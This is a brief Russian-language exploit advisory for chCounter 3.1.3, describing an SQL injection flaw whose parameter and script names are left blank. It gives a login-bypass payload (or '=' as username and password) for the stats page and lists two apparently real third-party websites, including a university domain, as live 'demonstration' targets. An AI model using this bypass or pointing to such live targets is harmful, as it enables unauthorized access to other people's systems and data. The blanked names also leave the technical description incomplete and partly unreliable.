Программа: chCounter 3.1.3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «» сценарием . Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольные SQL команды
в базе данных приложения.

Эксплоит:

http://www.[URL]//counter/stats/index.php
Используйте or ‘=’ в качестве имени и пароля.

Демонстрация:

http://www.brummelliese.de/count/stats/
http://www.fire.uni-freiburg.de/counter/welcome/stats/



Оставить мнение